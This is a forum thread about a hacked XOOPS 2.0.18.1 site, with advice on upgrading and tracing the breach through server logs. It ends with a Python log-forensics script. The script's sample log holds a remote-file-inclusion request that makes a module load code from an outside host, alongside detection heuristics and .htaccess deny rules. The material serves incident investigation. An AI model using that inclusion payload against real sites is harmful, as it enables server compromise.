xoops forums

limecity (Friend of XOOPS, Posts: 1602, Since: 2003/7/6)
Posted on: 2008/12/23 13:06
#1

User account hacked 2.0.18.1

One of my un-upgraded sites got hacked.
It is using XOOPS 2.0.18.1.

I have no idea how,
but the hacker has been using existing user accounts to post nonsense stuff.

What should I do now?

I have the Protector version for 2.0.18.1 running.
http://www.mounthiking.com
all your hiking gears and gadgets

abinsblaue (Just popping in, Posts: 27, Since: 2008/10/15)
Posted on: 2008/12/23 13:28
#2

Re: User account hacked 2.0.18.1

Upgrade to xoops-2.0.18.2 or XOOPS 2.3.2 ...

limecity (Friend of XOOPS, Posts: 1602, Since: 2003/7/6)
Posted on: 2008/12/23 13:42
#3

Re: User account hacked 2.0.18.1

Is it advisable to upgrade at this point?

Like I should install an antivirus when the virus is in the boot sector or something?

Please advise. Thanks.

ghia (Community Support Member, Posts: 4954, Since: 2008/7/3)
Posted on: 2008/12/23 16:39
#4

Re: User account hacked 2.0.18.1

Quote:
is it advisable to upgrade at this point ?

Before you can answer this question, you need to find out in which way the hacker gained access to your site.
If e.g. he found a security hole in a module, then it will not help you to upgrade XOOPS. If he found access to your site through some malware on the PC you are using to manage the site, it is obvious that you have to clean up your local PC.
Normally, you can say the more up to date the modules and XOOPS are, the better (although in the new 2.3.x series two additional security holes have been found during the last months).
At least go to 2.0.18.2, which is a less impacting upgrade than 2.3.2b, and check your modules (at least Protector) for the latest versions.

To find out how the hacker breached the system security, you have to examine the Apache log files.
Start e.g. with the posting time of a spam message.
Follow the trail by using the IP number and browser ID. If a user ID is known, follow also the same trails for requests where this ID was used.
Look also in the Protector log for incidents and use the IP and time to trail other requests.

By examining unusual requests (e.g. with an http address other than your server's), suspicious requests or unusual request patterns (e.g. no image requests), you can maybe find out which module was targeted and in which way database and user information was leaked.
Check also the byte count of the data transferred to the browser. Compare this count with legitimate requests.

If the hacker's IP is not from a country where you expect users or traffic from, block their net with .htaccess.
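The log-trail procedure ghia describes above (start at the spam post's timestamp, follow the IP and browser ID, look for requests embedding a foreign http address, look for clients that never fetch images, compare byte counts, then block the attacker's net), carried out as an added worked example. This is not code from the original thread or from XOOPS. It runs over a constructed Apache combined-format log embedded in the script; the module path /modules/somemod/, the hostname www.example.org, the user agents and every IP address in it are invented placeholders, and the .htaccess output uses the Apache 2.2 `Order`/`Deny from` syntax that was current in 2008.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
ASSET_EXT = (".gif", ".jpg", ".jpeg", ".png", ".css", ".js", ".ico")

# Constructed sample log (not a real capture): a browser session from 192.0.2.10 and a
# scripted session from 198.51.100.7. /modules/somemod/ is a placeholder, not a real module.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Dec/2008:12:58:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.5"
192.0.2.10 - - [23/Dec/2008:12:58:02 +0000] "GET /images/logo.gif HTTP/1.1" 200 2048 "http://www.example.org/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.5"
192.0.2.10 - - [23/Dec/2008:12:59:30 +0000] "POST /modules/newbb/post.php HTTP/1.1" 302 312 "http://www.example.org/modules/newbb/newtopic.php?forum=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.5"
198.51.100.7 - - [23/Dec/2008:13:04:10 +0000] "GET /modules/somemod/index.php?page=http://203.0.113.5/x.txt? HTTP/1.0" 200 48213 "-" "libwww-perl/5.805"
198.51.100.7 - - [23/Dec/2008:13:05:41 +0000] "POST /modules/newbb/post.php HTTP/1.0" 302 312 "-" "libwww-perl/5.805"
198.51.100.7 - - [23/Dec/2008:13:05:42 +0000] "POST /modules/newbb/post.php HTTP/1.0" 302 312 "-" "libwww-perl/5.805"
"""


def parse_time(s):
    return datetime.strptime(s, TIME_FMT)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["time"] = parse_time(e["time"])
        e["bytes"] = 0 if e["bytes"] == "-" else int(e["bytes"])
        entries.append(e)
    return entries


def is_asset(e):
    return e["path"].split("?", 1)[0].lower().endswith(ASSET_EXT)


def requests_near(entries, when, window=timedelta(minutes=2)):
    """Step 1: everything logged within +/- window of the spam post's timestamp."""
    return [e for e in entries if abs(e["time"] - when) <= window]


def trail(entries, ip, ua=None):
    """Step 2: follow one client by IP number and, optionally, the exact browser ID string."""
    return [e for e in entries if e["ip"] == ip and (ua is None or e["ua"] == ua)]


def foreign_url_requests(entries, own_host):
    """Requests whose path or query embeds a URL that points somewhere other than this
    server: the pattern of a remote-include attempt against a vulnerable module."""
    hits = []
    for e in entries:
        urls = re.findall(r'https?://[^\s&"]+', e["path"])
        if any(own_host not in u for u in urls):
            hits.append(e)
    return hits


def clients_without_assets(entries):
    """IPs that requested pages but never an image/CSS/JS file: a script, not a browser."""
    fetched_asset = defaultdict(bool)
    ips = set()
    for e in entries:
        ips.add(e["ip"])
        if is_asset(e):
            fetched_asset[e["ip"]] = True
    return sorted(ip for ip in ips if not fetched_asset[ip])


def oversized_page_responses(entries, legit, factor=3.0):
    """Successful page responses far larger than anything served to known-good requests;
    a leaked user table or database dump is much bigger than a normal page."""
    def page(e):
        return e["status"] == "200" and not is_asset(e)
    ceiling = factor * max((e["bytes"] for e in legit if page(e)), default=0)
    return [e for e in entries if page(e) and e["bytes"] > ceiling and e not in legit]


def htaccess_deny(ips):
    """.htaccess fragment (Apache 2.2 syntax) denying each attacker's /24 network."""
    nets = sorted({ip.rsplit(".", 1)[0] + ".0/24" for ip in ips})
    return "Order Allow,Deny\n" + "".join(f"Deny from {n}\n" for n in nets) + "Allow from all\n"


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    spam_time = parse_time("23/Dec/2008:13:05:41 +0000")   # time of the nonsense post
    posters = [e for e in requests_near(entries, spam_time) if e["method"] == "POST"]
    suspect = posters[0]
    print("suspect:", suspect["ip"], suspect["ua"])
    for e in trail(entries, suspect["ip"], suspect["ua"]):
        print(" ", e["time"], e["method"], e["path"], e["status"], e["bytes"])
    print("foreign URLs:", [e["path"] for e in foreign_url_requests(entries, "www.example.org")])
    print("no assets:", clients_without_assets(entries))
    legit = trail(entries, "192.0.2.10")
    print("oversized:", [(e["path"], e["bytes"]) for e in oversized_page_responses(entries, legit)])
    print(htaccess_deny([suspect["ip"]]))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents and the spam time with the one from the forum post; the three POSTs to post.php from one IP within seconds of each other, the earlier GET carrying an external http:// URL in its query string, and the 48 KB page response where a normal page is 5 KB are exactly the signals ghia describes, and they point at the module to check first.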